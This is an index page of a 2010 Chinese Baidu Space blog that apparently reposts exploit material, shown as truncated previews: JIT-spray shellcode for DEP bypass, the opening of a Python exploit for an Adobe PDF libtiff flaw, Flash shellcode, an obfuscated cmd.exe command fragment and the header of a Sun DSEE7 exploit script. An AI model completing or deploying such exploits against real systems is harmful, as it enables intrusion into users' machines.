function is_ShadowHider(){return true}_百度空间
百度空间 | 百度首页 
 
文章列表
 
2010-03-21 13:11
//  JITed egg-hunter stage-0 shellcode    (Permanent DEP bypass)
//      By Alexey Sintsov
//  dookie@inbox.ru
//  a.sintsov@dsec.ru
//  DSecRG - Digital Security Research Group [dsecrg.com]
//      TAG=3135330731353307
//                  its mean 0x07333531 twice!
//     
 
2010-03-13 15:01
Copyright villys777 All
http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html
Exploits works with Adobe js disabled.

import sys
import base64
import struct
import zlib
import StringIO

SHE
 
2010-03-13 01:12
 
2010-03-10 19:39
# Title: JITed exec notepad shellcode
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published:
# Verified: yes
# Download N/A

// JIT.swf
//
// By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
//
// DSecRG - Digital Security Research Group [dsecrg.com]
//
// PEB-DLL-System()-notepad
//

package {
import flash.display.MovieClip
public class Main extends MovieClip
{
fun
 
2010-03-08 16:20
# Title: JITed stage-0 shellcode
# Author: Alexey Sintsov
# Download N/A

// JIT_S0.AS
//
// VirtualProtect() stage-0 shellcode
//
// how to use stack
//
// 0000: 0x11111111 -- ret addr to JIT satge0 shellcode
// 0004: 0x60616f62 -- pointer on string atom (encoded high) if ret
// 0008: 0x60616f62 -- pointer on string atom (encoded high) if ret 4
// 000c: 0x60616f62 -- pointer on string atom (encoded high) if
 
2010-02-18 19:44

 
2010-01-15 18:17
tw的邮箱就这么危险么?
sun_yang_ming@yahoo.com同学,你的东西丢了。



Code:

%COMsPec% /C seT L=O AS&EC
 
2010-01-15 18:08
转载开始:

ESAPI4JS - The new hotness!

So I have been hard at work on the ESAPI4JS code for the last couple of weeks, and have gotten it to a point where people can start to play with it. It will be in alpha for a bit yet, as not all the functionality is there, but here is a little of what you can do with it so far.

Do
 
2010-01-14 20:08
新建一fvck.adm文件,写入如下内容:
------------------------------------------------------------------------------------------------------------------------------------
CLASS USER

CATEGORY "Adobe Reader"
POLICY "Version 8.0 JavaScript Settings"
KEYNAME "SOFTWARE\Adobe\Acrobat Reader\8.0\JSPrefs"
PART "Enable JavaScript"
CHECKBOX
 
2010-01-13 20:44
#!/usr/bin/env python
# sun_dsee7.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DAT
 
     
 
 
个人档案
 
zrxc

北京 宣武区 
上次登录:
3小时前
加为好友
 
   
 
文章分类
 
 
 
0day(33)
 
 
 
 
闲扯(30)
 
 
Xss(13)
 
     
 
最新评论
 
文章评论|照片评论


回复SoftRCE:
 

这次好像连标题都不认识.只认识博主
 

回复wert:编译成swf不就行了
 
 

回复kEv:kevin牛威武...
 
你家狗狗的狗牙不好看!
 
     
 
留言板
 

过来踩一踩。我空间有很多好看到东西。记得回踩哦。!
 

杨柳遇春时,黄金色更辉,祝您新的一年,万事如意!
 

博主:你妈妈喊你回家当村主任///一个村主任有五辆豪车。220亩的别墅,而我们一个刚毕...
 

回复zrxc:额...不过您的溢出我感觉蛮n的啊!!!
 

回复pr0t3ct::( 我不是搞溢出的
 
     
 
最新照片
 
   
 
最近访客
 
 

harite

menzhi007

0x255

tr4c3

damncool

SoftRCE

deepxia

vulnbug
     
 
背景音乐
 
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2010 Baidu